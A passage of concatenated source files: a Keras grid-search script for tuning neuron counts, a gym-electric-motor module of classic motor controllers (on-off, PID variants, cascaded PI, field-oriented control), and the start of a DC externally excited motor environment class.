self.nextMiddleware(params)
``` |
{
"source": "54chen/deep",
"score": 2
} |
#### File: 54chen/deep/test7.py
```python
import numpy
from sklearn.model_selection import GridSearchCV
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.wrappers.scikit_learn import KerasClassifier
from keras.constraints import maxnorm
from keras.wrappers.scikit_learn import BaseWrapper
import copy
def custom_get_params(self, **params):
res = copy.deepcopy(self.sk_params)
res.update({'build_fn': self.build_fn})
return res
BaseWrapper.get_params = custom_get_params
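# Note (sketch): this monkey patch works around KerasClassifier versions whose
# get_params() omitted build_fn, which broke scikit-learn's clone() inside
# GridSearchCV; with recent wrappers it should be unnecessary.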
# Function to create model, required for KerasClassifier
def create_model(neurons=1):
# create model
model = Sequential()
model.add(Dense(neurons, input_dim=8, init='uniform', activation='softplus', W_constraint=maxnorm(4)))
model.add(Dropout(0.1))
model.add(Dense(1, init='uniform', activation='sigmoid'))
# Compile model
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
# fix random seed for reproducibility
seed = 7
numpy.random.seed(seed)
# load dataset
dataset = numpy.loadtxt("0207.csv", delimiter=",")
# split into input (X) and output (Y) variables
X = dataset[:,0:8]
Y = dataset[:,8]
# create model
model = KerasClassifier(build_fn=create_model, nb_epoch=50, batch_size=10, verbose=0)
# define the grid search parameters
neurons = [1, 5, 10, 15, 20, 25, 30]
param_grid = dict(neurons=neurons)
grid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-1)
grid_result = grid.fit(X, Y)
# summarize results
print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
``` |
{
"source": "54hanxiucao/gym-electric-motor",
"score": 3
} |
#### File: examples/classic_controllers/simple_controllers.py
```python
import time
from gym.spaces import Discrete, Box
import sys
import os
sys.path.append(os.path.abspath(os.path.join('..')))
from gym_electric_motor.physical_systems.electric_motors import DcShuntMotor, DcExternallyExcitedMotor, \
DcPermanentlyExcitedMotor, DcSeriesMotor
from gym_electric_motor.physical_systems import SynchronousMotorSystem, DcMotorSystem
import math
import numpy as np
class Controller:
"""
    A base class for the various controllers that accompany the motor environments.
"""
@classmethod
def make(cls, controller_type, environment, **controller_kwargs):
"""
Args:
            controller_type : Choose among the set of controllers registered at the end of this module
            environment : The corresponding motor environment from the 'envs' package.
"""
assert controller_type in _controllers.keys(), f'Controller {controller_type} unknown'
controller = _controllers[controller_type](environment, **controller_kwargs)
return controller
def control(self, state, reference):
raise NotImplementedError
def reset(self):
pass
class OnOffController(Controller):
"""
    A simple on-off controller with optional hysteresis that outputs high_action while the referenced state
    is below the reference value and low_action otherwise. The hysteresis (0.01 by default) is needed because
    the constant switching would otherwise produce very high switching frequencies around the reference value.
    Valid for motors with a discrete action space
"""
def __init__(self, environment, hysteresis=0.01, state_idx=None, reference_idx=0):
action_space = environment.action_space
assert type(action_space) is Discrete, 'Not suitable action space for On off controller'
self._hysteresis = hysteresis
self._high_action = 1
if action_space.n in [3, 4]:
self._low_action = 2
else:
self._low_action = 0
if state_idx is None:
self._referenced_state = np.argmax(
environment.reference_generator.referenced_states[environment.state_filter]
)
else:
self._referenced_state = state_idx
self._ref_idx = reference_idx
def control(self, state, reference):
if state[self._referenced_state] < reference[self._ref_idx] - self._hysteresis:
return self._high_action
else:
return self._low_action
class ThreePointController(Controller):
"""
    An implementation of a three-point controller: it outputs high_action while the referenced state is below
    the reference value, low_action while it is above, and idle_action while it is inside the hysteresis band
    around the reference. The hysteresis (0.01 by default) is needed because the constant switching would
    otherwise produce very high switching frequencies around the reference value.
    Valid for motors with a discrete action space
"""
def __init__(self, environment, hysteresis=0.01, state_idx=None, reference_idx=0):
action_space = environment.action_space
assert type(action_space) is Discrete, 'Not suitable action space for three point controller'
self._hysteresis = hysteresis
self._high_action = 1
self._idle_action = 0
self._ref_idx = reference_idx
if action_space.n in [3, 4]:
self._low_action = 2
else:
self._low_action = 0
if state_idx is None:
self._referenced_state = np.argmax(
environment.reference_generator.referenced_states[environment.state_filter]
)
else:
self._referenced_state = state_idx
def control(self, state, reference):
if state[self._referenced_state] < reference[self._ref_idx] - self._hysteresis:
return self._high_action
elif state[self._referenced_state] > reference[self._ref_idx] + self._hysteresis:
return self._low_action
else:
return self._idle_action
class PController(Controller):
"""
    In the proportional control implementation below, the controller output is proportional to the error
    signal, i.e. the difference between the reference value and the referenced state: the output is the
    product of the error signal and the proportional gain. k_p = 10 is assumed as the default proportional
    gain, which is likely to require adaption to a given control plant.
    Valid for the DC motor system
"""
def __init__(self, environment, k_p=10, controller_no=0, state_idx=None, reference_idx=0):
action_space = environment.action_space
assert type(action_space) is Box and type(
environment.physical_system) is DcMotorSystem, 'No suitable action space for P Controller'
self._k_p = k_p
self._controller_no = controller_no
self._action_min = action_space.low[controller_no]
self._action_max = action_space.high[controller_no]
self._ref_idx = reference_idx
if state_idx is None:
self._referenced_state = np.argmax(
environment.reference_generator.referenced_states[environment.state_filter]
)
else:
self._referenced_state = state_idx
def control(self, state, reference):
return np.array([
max(
self._action_min,
min(
self._action_max,
self._k_p * (reference[self._ref_idx] - state[self._referenced_state])
)
)
])
class IController(Controller):
"""
    In the integral control implementation below, the controller output is proportional to the integral of the
    error signal, i.e. the difference between the reference value and the referenced state: the output is the
    product of the integrated error signal and the integral gain. k_i = 0.01 is assumed as the default
    integral gain, which is likely to require individual tuning for the given control plant.
    Valid for the DC motor system
"""
def __init__(self, environment, k_i=0.01, controller_no=0, state_idx=None, reference_idx=0):
action_space = environment.action_space
assert type(action_space) is Box and type(
environment.physical_system) is DcMotorSystem, 'No Suitable action Space for I controller'
self._k_i = k_i
self._tau = environment.physical_system.tau
self._integrated_value = 0
self._limits = environment.physical_system.limits
self._controller_no = controller_no
self._action_min = action_space.low[controller_no]
        self._action_max = action_space.high[controller_no]
self._ref_idx = reference_idx
        self._referenced_state = state_idx if state_idx is not None \
            else np.argmax(environment.reference_generator.referenced_states)
self._referenced_state_max = self._limits[self._referenced_state] \
* environment.physical_system.state_space.high[self._referenced_state]
self._referenced_state_min = self._limits[self._referenced_state] \
* environment.physical_system.state_space.low[self._referenced_state]
def control(self, state, reference):
diff = reference[self._ref_idx] - state[self._referenced_state]
self._integrated_value += diff * self._tau
        # clamp the integral part to the state limits (anti-reset windup)
        if self._integrated_value > self._referenced_state_max:  # check upper limit
            self._integrated_value = self._referenced_state_max
        elif self._integrated_value < self._referenced_state_min:  # check lower limit
            self._integrated_value = self._referenced_state_min
return np.array([
max(
self._action_min,
min(
self._action_max, self._k_i * self._integrated_value
)
)
])
def reset(self, **__):
self._integrated_value = 0
class PIController(PController):
"""
This class performs discrete-time PI controller computation using the error signal and
proportional and integral gain inputs. The error signal is the difference between the reference_idx and the
referenced_state. It outputs a weighted sum of the input error signal and the integral of the input error signal.
Valid for DC motor system
"""
def __init__(self, environment, k_p=10, k_i=0.01, controller_no=0, reference_idx=0):
        super().__init__(environment, k_p, controller_no, reference_idx=reference_idx)
action_space = environment.action_space
assert type(action_space) is Box and type(
environment.physical_system) is DcMotorSystem, 'No suitable action space for PI Controller'
self._k_i = k_i
self._ref_idx = reference_idx
self._tau = environment.physical_system.tau
self._limits = environment.physical_system.limits
self._integrated_value = 0
self._referenced_state_max = self._limits[self._referenced_state] \
* environment.physical_system.state_space.high[self._referenced_state]
self._referenced_state_min = self._limits[self._referenced_state] \
* environment.physical_system.state_space.low[self._referenced_state]
self._motor_parameter = environment.physical_system.electrical_motor.motor_parameter
def control(self, state, reference):
diff = reference[self._ref_idx] - state[self._referenced_state]
self._integrated_value += diff * self._tau
        # clamp the integral part to the state limits (anti-reset windup)
        if self._integrated_value > self._referenced_state_max:  # check upper limit
            self._integrated_value = self._referenced_state_max
        elif self._integrated_value < self._referenced_state_min:  # check lower limit
            self._integrated_value = self._referenced_state_min
return np.array([
max(
self._action_min,
min(
self._action_max,
self._k_p * (reference[self._ref_idx] - state[self._referenced_state])
+ self._k_i * self._integrated_value
)
)
])
def reset(self, **__):
self._integrated_value = 0
class DController(Controller):
"""
    In the derivative control implementation below, the controller output is proportional to the derivative of
    the error signal, i.e. the difference between the reference value and the referenced state: the output is
    the product of the error derivative and the derivative gain. k_d = 1 is assumed as the default derivative
    gain, which is likely to require individual tuning for the given control plant.
    Valid for the DC motor system
"""
def __init__(self, environment, k_d=1, controller_no=0, state_idx=None, reference_idx=0):
self._derivative_value = 0
self._tau = environment.physical_system.tau
self._prev_error = 0
action_space = environment.action_space
assert type(action_space) is Box and type(
environment.physical_system), 'No suitable action space for P Controller'
self._k_d = k_d
self._controller_no = controller_no
self._tau = environment.physical_system.tau
self._action_min = action_space.low[controller_no]
self._action_max = action_space.high[controller_no]
self._limits = environment.physical_system.limits
self._ref_idx = reference_idx
        self._referenced_state = state_idx if state_idx is not None \
            else np.argmax(environment.reference_generator.referenced_states)
self._referenced_state_max = self._limits[self._referenced_state] \
* environment.physical_system.state_space.high[self._referenced_state]
self._referenced_state_min = self._limits[self._referenced_state] \
* environment.physical_system.state_space.low[self._referenced_state]
def control(self, state, reference):
diff = reference[self._ref_idx] - state[self._referenced_state]
de = diff - self._prev_error
self._derivative_value = de / self._tau
self._prev_error = diff
return np.array([
max(
self._action_min,
min(
self._action_max,
self._k_d * self._derivative_value
)
)
])
def reset(self, **__):
self._derivative_value = 0
class PIDController(PIController):
"""
    This class performs discrete-time PID controller computation using the error signal and the
    proportional, integral and derivative gains. The error signal is the difference between the reference
    value and the referenced state. The output is a weighted sum of the input error signal, its integral
    and its derivative.
    Valid for the DC motor system
"""
def __init__(self, environment, k_p=10, k_i=0.01, k_d=1, controller_no=0, reference_idx=0):
super().__init__(environment, k_p, k_i, controller_no, reference_idx)
self._ref_dx = reference_idx
action_space = environment.action_space
assert type(action_space) is Box and type(
environment.physical_system) is DcMotorSystem, 'No suitable action space for PI Controller'
self._k_i = k_i
self._k_d = k_d
self._k_p = k_p
self._tau = environment.physical_system.tau
self._limits = environment.physical_system.limits
self._integrated_value = 0
self._derivative_value = 0
self._prev_error = 0
self._current_time = time.time()
self._prev_time = self._current_time
self._referenced_state_max = self._limits[self._referenced_state] \
* environment.physical_system.state_space.high[self._referenced_state]
self._referenced_state_min = self._limits[self._referenced_state] \
* environment.physical_system.state_space.low[self._referenced_state]
def control(self, state, reference):
diff = reference[self._ref_idx] - state[self._referenced_state]
de = diff - self._prev_error
        self._derivative_value = de / self._tau
        self._integrated_value += diff * self._tau
        self._prev_error = diff
        self._prev_time = self._current_time
        # clamp the integral part to the state limits (anti-reset windup)
        if self._integrated_value > self._referenced_state_max:  # check upper limit
            self._integrated_value = self._referenced_state_max
        elif self._integrated_value < self._referenced_state_min:  # check lower limit
            self._integrated_value = self._referenced_state_min
return np.array([
max(
self._action_min,
min(
self._action_max,
(self._k_p * (reference[self._ref_dx] - state[self._referenced_state]))
+ (self._k_i * self._integrated_value) + (self._k_d * self._derivative_value)
)
)
])
def reset(self, **__):
self._integrated_value = 0
class DCCascadedPIController(Controller):
"""
    The cascade architecture consists of two controllers (an inner/secondary and an outer/primary controller)
    and two measured state variables (an inner PV2 and an outer PV1). The primary (master) controller generates
    a control effort that serves as the reference for the secondary (slave) controller. That controller in turn
    uses the actuator to apply its control effort directly to the secondary process, which then generates a
    secondary process variable that serves as the control effort for the primary process. This geometry defines
    an inner loop involving the current controller and an outer loop involving the speed controller. The inner
    loop functions like a traditional feedback control system with a reference variable, a measured variable,
    and a controller acting on a process by means of an actuator; the outer loop does the same except that it
    uses the entire inner loop as its actuator.
    Valid for the DC motor system only
"""
def __init__(self, environment, ref_idx=0):
assert type(environment.physical_system) is DcMotorSystem
        self._omega_idx = np.argmax(np.array(environment.state_names) == 'omega')
self._currents_idx = environment.physical_system.CURRENTS_IDX
self._voltages_idx = environment.physical_system.VOLTAGES_IDX
self._u_a_idx = self._voltages_idx[0]
self._i_a_idx = self._currents_idx[0]
self._u_sup = environment.physical_system.supply.u_nominal
if len(self._currents_idx) > 1:
self._i_e_idx = np.argmax(np.array(environment.state_names) == 'i_e')
else:
self._i_e_idx = np.argmax(np.array(environment.state_names) == 'i')
if len(self._voltages_idx) > 1:
self._u_e_idx = np.argmax(np.array(environment.state_names) == 'u_e')
else:
self._u_e_idx = None
self._limits = environment.physical_system.limits[environment.state_filter]
self._ref_idx = ref_idx
self._tau = environment.physical_system.tau
mp = environment.physical_system.electrical_motor.motor_parameter
t_motor = mp['l_a'] / mp['r_a']
t_t = 3 / 2 * self._tau
r_motor = mp['r_a']
self._i_a_max = 0
self._i_a_min = 0
self._u_a_max = 0
self._u_a_min = 0
self._integrated_values = [0, 0]
self._converter_voltages = environment.physical_system.converter.voltages
self._i_a_max = self._limits[self._i_a_idx] * environment.physical_system.state_space.high[self._i_a_idx]
self._i_a_min = self._limits[self._i_a_idx] * environment.physical_system.state_space.low[self._i_a_idx]
if 'psi_e' in mp.keys():
self._psi_e = mp['psi_e']
self._i_e_max_prime = None
elif 'l_e_prime' in mp.keys():
self._psi_e = None
self._i_e_max_prime = self._limits[self._currents_idx[-1]] * mp['l_e_prime']
else:
raise Exception('Motor Parameter Error. No psi_e and no l_e_prime entry found in motor parameters')
self._u_a_max = self._limits[self._u_a_idx] * environment.physical_system.state_space.high[self._u_a_idx]
self._u_a_min = self._limits[self._u_a_idx] * environment.physical_system.state_space.low[self._u_a_idx]
# compute motor type specific parameter
# use inner_ and outer_gain_adjustment to adjust the integral part gains for better control behaviour
# Gains chosen as given in "Elektrische Antriebe - Regelung von Antriebssystemen", <NAME>, 2009
if type(environment.physical_system.electrical_motor) == DcPermanentlyExcitedMotor:
inner_gain_adjustment = 1e-3
outer_gain_adjustment = 1e-3
elif type(environment.physical_system.electrical_motor) == DcSeriesMotor:
t_motor = (mp['l_a'] + mp['l_e']) / (mp['r_a'] + mp['r_e'])
r_motor = (mp['r_a'] + mp['r_e'])
inner_gain_adjustment = 1
outer_gain_adjustment = 1
elif type(environment.physical_system.electrical_motor) == DcExternallyExcitedMotor:
inner_gain_adjustment = 1E-4
outer_gain_adjustment = 1E-3
elif type(environment.physical_system.electrical_motor) == DcShuntMotor:
inner_gain_adjustment = 1E-2
outer_gain_adjustment = 1
else:
raise Exception('Unknown Motor')
# set up gains for the controller
# Integral gains are multiplied by the sampling time to simplify the computation during control
t_sigma = min(t_motor, t_t)
t_1 = max(t_motor, t_t)
v_s = 1 / r_motor
# Integral Inner loop
self._k_i_i = 1 / (2 * t_sigma * v_s) * self._tau * inner_gain_adjustment
# Proportional Inner loop
self._k_p_i = t_1 / (2 * t_sigma * v_s)
# Integral Outer loop
j = environment.physical_system.mechanical_load.j_total
self._k_i_o = (
j / (32 * t_sigma ** 2)
* self._tau * outer_gain_adjustment
)
# Proportional Outer loop
self._k_p_o = j / (4 * t_sigma)
def control(self, state, reference):
# denormalize quantities
omega = state[self._omega_idx] * self._limits[self._omega_idx]
omega_ref = reference[self._ref_idx] * self._limits[self._omega_idx]
i_a = state[self._i_a_idx] * self._limits[self._i_a_idx]
psi_e = self._psi_e or state[self._i_e_idx] * self._i_e_max_prime
# outer control loop
d_omega = omega_ref - omega
if psi_e != 0:
temp = self._integrated_values[0] + d_omega * self._k_i_o / psi_e # integral part
i_a_des = temp + d_omega * self._k_p_o / psi_e
else:
i_a_des = math.copysign(1, d_omega) * self._i_a_max
temp = self._integrated_values[0]
# hold current constraints, anti wind-up
if i_a_des > self._i_a_max or i_a_des < self._i_a_min:
i_a_des = min(max(i_a_des, self._i_a_min), self._i_a_max)
else:
self._integrated_values[0] = temp
d_i_a = i_a_des - i_a
# inner control loop
temp = self._integrated_values[1] + d_i_a * self._k_i_i # integral part
d_u_a = temp + d_i_a * self._k_p_i
u_a_0 = omega * psi_e
u_a = d_u_a + u_a_0
# hold voltage limits, anti wind-up
if u_a > self._u_a_max or u_a < self._u_a_min:
u_a = min(max(u_a, self._u_a_min), self._u_a_max)
else:
self._integrated_values[1] = temp
# normalize the desired output voltage to a duty cycle referring to the supply voltage
# Assumption: u_sup = u_N is made
des_duty_cycle = u_a / self._limits[self._u_a_idx]
# Voltage compensation
u_sup_avg = (self._u_sup * self._tau) / self._tau
des_duty_cycle = des_duty_cycle * (u_sup_avg / self._u_sup)
duty_cycle = min(
max(des_duty_cycle, self._u_a_min / self._limits[self._u_a_idx]),
self._u_a_max / self._limits[self._u_a_idx])
return np.array([duty_cycle])
class FOCController(Controller):
"""
The following FOC is used to control AC three-phase permanent magnet motors. The stator currents of a three-phase AC electric motor are identified
as two orthogonal components that can be visualized with a vector. One component defines the magnetic flux of the motor, the other the torque.
The control system of the drive calculates the corresponding current component references from the flux and torque references given
by the drive's speed control.
"""
def __init__(self, environment, ref_idx=0, weight=1, dq_decoupling=False):
assert type(environment.physical_system) is SynchronousMotorSystem
self._dq_decoupling = dq_decoupling # Can be turned ON
self._ref_idx = ref_idx
self._weight = weight
self._omega_idx = np.argmax(np.array(environment.state_names) == 'omega')
self._currents_idx = np.zeros(2, dtype=int)
self._currents_idx[0] = np.argmax(np.array(environment.state_names) == 'i_sq')
self._currents_idx[1] = np.argmax(np.array(environment.state_names) == 'i_sd')
self._voltages_idx = np.zeros(2, dtype=int)
self._voltages_idx[0] = np.argmax(np.array(environment.state_names) == 'u_sq')
self._voltages_idx[1] = np.argmax(np.array(environment.state_names) == 'u_sd')
self._epsilon_idx = np.argmax(np.array(environment.state_names) == 'epsilon')
self._limits = environment.physical_system.limits[environment.state_filter]
self._tau = environment.physical_system.tau
t32 = environment.physical_system.electrical_motor.t_32
q = environment.physical_system.electrical_motor.q
t23 = environment.physical_system.electrical_motor.t_23
q_inv = environment.physical_system.electrical_motor.q_inv
self._forward_transformation = lambda quantities, eps: q_inv(t23(quantities), eps)[::-1]
self._backward_transformation = (
lambda quantities, eps: t32(q(quantities[::-1], eps))
)
self._motor_parameter = environment.physical_system.electrical_motor.motor_parameter
mp = self._motor_parameter
# current controller i_d
t_motor_d = mp['l_d'] / mp['r_s']
tau = environment.physical_system.tau
t_t = 3 / 2 * tau
t_1_d = max(t_motor_d, t_t)
t_sigma_d = min(t_motor_d, t_t)
v_s_d = 1 / mp['r_s']
# current controller i_q
t_motor_q = mp['l_q'] / mp['r_s']
t_1_q = max(t_motor_q, t_t)
t_sigma_q = min(t_motor_q, t_t)
v_s_q = 1 / mp['r_s']
# outer speed controller
t_2 = 2 * t_sigma_q
t_1_s = environment.physical_system.mechanical_load.j_total
v_s_s = 3 / 2 * mp['p'] * mp['psi_p']
self._k_i_t = 2 * t_1_s / v_s_s * tau # integral gain speed controller.
self._k_p_t = t_1_s / (2 * t_2 * v_s_s) # prop. gain speed controller
self._k_i_d = 1 / (2 * t_sigma_d * v_s_d) * tau # integral gain i_sd controller.
self._k_p_d = t_1_d / (2 * t_sigma_d * v_s_d) # prop. gain i_sd controller
self._k_i_q = 1 / (2 * t_sigma_q * v_s_q) * tau # integral gain i_sq controller.
self._k_p_q = t_1_q / (2 * t_sigma_q * v_s_q) # prop. gain i_sq controller
# specify max values for normalisation and anti wind up
# an anti wind up scheme is necessary for good control behaviour to limit the integral parts in case of
# limit violations of the desired input voltage
# maximum speed without flux weakening
        self._omega_1 = (
            self._limits[self._voltages_idx[0]] / mp['l_q']
            / np.sqrt(
                self._limits[self._currents_idx[0]] ** 2
                + mp['psi_p'] ** 2 / mp['l_q'] ** 2
            )
        )
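        # Derivation note (sketch): below base speed the stator voltage magnitude is
        # roughly u_s = omega * sqrt((l_q * i_sq)^2 + psi_p^2), so solving for omega at
        # the voltage and current limits gives the omega_1 computed above.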
self._integrated_values = [0, 0, 0]
def reset(self):
self._integrated_values = [0, 0, 0]
def control(self, state, reference):
"""
Field oriented control from the lecture "controlled three phase drives, chapter 5"
"""
# extract quantities from state
mp = self._motor_parameter
omega = state[self._omega_idx] * self._limits[self._omega_idx]
omega_ref = reference[self._ref_idx] * self._limits[self._omega_idx]
# u = state[self._voltages_idx] * self._limits[self._voltages_idx]
epsilon = state[self._epsilon_idx] * self._limits[self._epsilon_idx]
i_qd = state[self._currents_idx] * self._limits[self._currents_idx]
# compute u_d_0 and u_q_0
u_d_0 = omega * mp['l_q'] * i_qd[0]
u_q_0 = omega * (mp['psi_p'] + mp['l_d'] * i_qd[1])
d_omega = omega_ref - omega
# compute T* (Torque reference) and i*_sq (q-axis current reference)
temp = self._integrated_values[0] + d_omega * self._k_i_t # integral part
t_des = temp + d_omega * self._k_p_t # proportional part
i_sq_des = 2 * t_des / (3 * mp['p'] * mp['psi_p'])
# anti wind-up
if i_sq_des > self._limits[self._currents_idx[0]] * self._weight \
or i_sq_des < -self._limits[self._currents_idx[0]] * self._weight:
i_sq_des = min(
max(i_sq_des, -self._limits[self._currents_idx[0]] * self._weight),
self._limits[self._currents_idx[0]] * self._weight
)
else:
self._integrated_values[0] = temp
if abs(omega_ref) < self._omega_1:
i_sd_des = 0
else:
            i_sd_des = (
                ((self._limits[self._voltages_idx[0]] / omega_ref) ** 2
                 - (mp['l_q'] * self._limits[self._currents_idx[0]]) ** 2
                 - mp['psi_p'] ** 2)
                / (2 * mp['psi_p'] * mp['l_d'])
            )
# transform back to abc-domain
currents = self._backward_transformation((i_sq_des, i_sd_des), epsilon)
# test if current limits are violated
if np.max(np.abs(currents)) > self._limits[self._currents_idx[0]]:
clipping = self._limits[self._currents_idx[0]]
currents = np.clip(currents, -clipping, clipping)
array = self._forward_transformation(currents, epsilon)
i_sd_des = array[1]
i_sq_des = array[0]
# compute du*_sq, du*_sd
d_i_sd = i_sd_des - i_qd[1]
d_i_sq = i_sq_des - i_qd[0]
temp_u_sd = self._integrated_values[1] + d_i_sd * self._k_i_d # integral part
temp_u_sq = self._integrated_values[2] + d_i_sq * self._k_i_q # integral part
d_u_sd_des = temp_u_sd + d_i_sd * self._k_p_d
d_u_sq_des = temp_u_sq + d_i_sq * self._k_p_q
# anti-wind-up u_sd
if d_u_sd_des > self._limits[self._voltages_idx[0]] * self._weight - u_d_0 or \
d_u_sd_des < -self._limits[self._voltages_idx[0]] * self._weight - u_d_0:
d_u_sd_des = np.clip(d_u_sd_des, -self._limits[self._voltages_idx[0]] * self._weight - u_d_0,
self._limits[self._voltages_idx[0]] * self._weight - u_d_0)
else:
self._integrated_values[1] = temp_u_sd
# anti-wind-up u_sq
if d_u_sq_des > self._limits[self._voltages_idx[0]] * self._weight - u_q_0 or \
d_u_sq_des < -self._limits[self._voltages_idx[0]] * self._weight - u_q_0:
d_u_sq_des = np.clip(d_u_sq_des, -self._limits[self._voltages_idx[0]] * self._weight - u_q_0,
self._limits[self._voltages_idx[0]] * self._weight - u_q_0)
else:
self._integrated_values[2] = temp_u_sq
# compute u*_sq, u*_sd, epsilon + d_epsilon due to delay of the controller
u_sd_des = u_d_0 + d_u_sd_des
u_sq_des = d_u_sq_des + u_q_0
epsilon_shift = epsilon + 3 / 2 * self._tau * omega
# If we require dq-decoupling at higher speeds, the below block can be executed
if self._dq_decoupling:
u_sd_des = u_sd_des - u_d_0
u_sq_des = u_sq_des + u_q_0
else:
u_sd_des = u_sd_des
u_sq_des = u_sq_des
# from d/q to alpha/beta and a/b/c
u_qd_des = np.array([u_sq_des, u_sd_des])
# voltages = self._backward_transformation(u_qd_des, epsilon_shift)
# normalise inputs
result = np.clip(u_qd_des / self._limits[self._voltages_idx[0]], -1, 1)
return result
class zero_voltage_injection:
"""
    The class below implements zero (common-mode) voltage injection: a zero-sequence offset
    u_o = (u_max + u_min) / 2 is subtracted from all three phase voltages. This lowers the peak phase
    voltage without changing the line-to-line voltages and thereby increases the overall voltage
    utilization of the converter.
"""
def __init__(self, environment, state_idx=None, ref_idx=0):
self._omega_idx = environment.physical_system.OMEGA_IDX
self._currents_idx = environment.physical_system.CURRENTS_IDX
self._voltages_idx = environment.physical_system.VOLTAGES_IDX
self._limits = environment.physical_system.limits
self._tau = environment.physical_system.tau
q = environment.physical_system.electrical_motor.q
t23 = environment.physical_system.electrical_motor.t_23
self._epsilon_idx = environment.physical_system.EPSILON_IDX
self._limits = environment.physical_system.limits
        t32 = environment.physical_system.electrical_motor.t_32
self._ref_idx = ref_idx
        self._referenced_state = state_idx if state_idx is not None \
            else np.argmax(environment.reference_generator.referenced_states)
q_inv = environment.physical_system.electrical_motor.q_inv
self._forward_transformation = lambda quantities, eps: q_inv(t23(quantities), eps)[::-1]
self._backward_transformation = (
lambda quantities, eps: t32(q(quantities[::-1], eps))
)
self._motor_parameter = environment.physical_system.electrical_motor.motor_parameter
def control(self, state):
i = state[self._currents_idx] * self._limits[self._currents_idx]
epsilon = state[self._epsilon_idx] * self._limits[self._epsilon_idx]
i_qd = self._forward_transformation(i, epsilon)
mp = self._motor_parameter
omega = state[self._omega_idx] * self._limits[self._omega_idx]
u_d_0 = omega * mp['l_q'] * i_qd[0]
u_q_0 = omega * (mp['psi_p'] + mp['l_d'] * i_qd[1])
u_a, u_b, u_c = self._backward_transformation((u_q_0, u_d_0), epsilon)
voltages = [u_a, u_b, u_c]
u_o = 1 / 2 * (max(voltages) + min(voltages))
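        # Numeric sketch: for (u_a, u_b, u_c) = (1.0, -0.5, -0.5) the offset is
        # u_o = (1.0 + (-0.5)) / 2 = 0.25, shifting the phases to (0.75, -0.75, -0.75);
        # the lower peak phase value leaves more headroom for the fundamental voltage.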
voltages[0] = voltages[0] - u_o
voltages[1] = voltages[1] - u_o
voltages[2] = voltages[2] - u_o
result = np.clip(voltages / self._limits[self._voltages_idx[0]], -1, 1)
return result
_controllers = {
'on_off': OnOffController,
'three_point': ThreePointController,
'p_controller': PController,
'i_controller': IController,
'pi_controller': PIController,
'pid_controller': PIDController,
'd_controller': DController,
'cascaded_pi': DCCascadedPIController,
'foc_controller': FOCController,
}
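# Example usage (sketch): the environment key and the reset()/step() signatures
# below follow the gym-electric-motor 0.x API and may differ in other versions.
if __name__ == '__main__':
    import gym_electric_motor as gem
    env = gem.make('DcSeriesCont-v1')
    controller = Controller.make('pi_controller', env, k_p=10, k_i=0.01)
    state, reference = env.reset()
    for _ in range(1000):
        action = controller.control(state, reference)
        (state, reference), reward, done, _ = env.step(action)
        if done:
            state, reference = env.reset()
            controller.reset()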
```
#### File: envs/gym_dcm/dc_extex_motor_env.py
```python
from ...core import ElectricMotorEnvironment
from ...physical_systems.physical_systems import DcMotorSystem
from ...reference_generators import WienerProcessReferenceGenerator
from ...reward_functions import WeightedSumOfErrors
class DcExternallyExcitedMotorEnvironment(ElectricMotorEnvironment):
def __init__(self, motor='DcExtEx', reward_function=None, reference_generator=None, physical_system=None,
constraints=('i_a', 'i_e'), **kwargs):
"""
Args:
motor(ElectricMotor): Electric Motor used in the PhysicalSystem
reward_function(RewardFunction): Reward Function for the environment
reference_generator(ReferenceGenerator): Reference Generator for the environment
kwargs(dict): Further kwargs to pass to the superclass and the submodules
"""
physical_system = physical_system or DcMotorSystem(motor=motor, **kwargs)
reference_generator = reference_generator or WienerProcessReferenceGenerator(**kwargs)
reward_function = reward_function or WeightedSumOfErrors(**kwargs)
super().__init__(
physical_system, reference_generator=reference_generator, reward_function=reward_function,
constraints=constraints, **kwargs
)
class DiscDcExternallyExcitedMotorEnvironment(DcExternallyExcitedMotorEnvironment):
"""
Description:
Environment to simulate a discretely controlled externally excited DC Motor
Key:
`DcExtExDisc-v1`
Default Modules:
Physical System:
SCMLSystem/DcMotorSystem with:
| IdealVoltageSupply
| DiscDoubleConverter(subconverters=('Disc-4QC', 'Disc-1QC'))
| DcExternallyExcitedMotor
| PolynomialStaticLoad
| GaussianWhiteNoiseGenerator
| EulerSolver
| tau=1e-5
Reference Generator:
WienerProcessReferenceGenerator
Reference Quantity. 'omega'
Reward Function:
WeightedSumOfErrors(reward_weights= {'omega': 1 })
Visualization:
ElectricMotorVisualization (Dummy for no Visualization)
State Variables:
``['omega' , 'torque', 'i_a', 'i_e', 'u_a', 'u_e', 'u_sup']``
Observation Space:
Type: Tuple(State_Space, Reference_Space)
State Space:
Box(low=[-1, -1, -1, -1, -1, -1, 0], high=[1, 1, 1, 1, 1, 1, 1])
Reference Space:
Box(low=[-1], high=[1])
Action Space:
Type: Discrete(8)
Starting State:
Zeros on all state variables.
Episode Termination:
Termination if current limits are violated. The terminal reward -10 is used as reward.
(Have a look at the reward functions.)
"""
def __init__(self, tau=1e-5, converter='Disc-Multi', subconverters=('Disc-4QC', 'Disc-1QC'), **kwargs):
# Docstring in Base Class
super().__init__(tau=tau, converter=converter, subconverters=subconverters, **kwargs)
class ContDcExternallyExcitedMotorEnvironment(DcExternallyExcitedMotorEnvironment):
"""
Description:
Environment to simulate a continuously controlled externally excited DC Motor
Key:
`DcExtExCont-v1`
Default Modules:
Physical System:
SCMLSystem/DcMotorSystem with:
| IdealVoltageSupply
| ContDoubleConverter(subconverters=('Cont-4QC', 'Cont-1QC'))
| DcExternallyExcitedMotor
| PolynomialStaticLoad
| GaussianWhiteNoiseGenerator
| EulerSolver.
| tau=1e-4
Reference Generator:
WienerProcessReferenceGenerator
Reference Quantity. 'omega'
Reward Function:
WeightedSumOfErrors(reward_weights= {'omega': 1 })
Visualization:
ElectricMotorVisualization (Dummy for no Visualization)
State Names:
``['omega' , 'torque', 'i_a', 'i_e', 'u_a', 'u_e', 'u_sup']``
Observation Space:
Type: Tuple(State_Space, Reference_Space)
State Space:
Box(low=[-1, -1, -1, -1, -1, -1, 0], high=[1, 1, 1, 1, 1, 1, 1])
Reference Space:
Box(low=[-1], high=[1])
Action Space:
Type: Box(low=[-1,0], high=[1,1])
Starting State:
Zeros on all state variables.
Episode Termination:
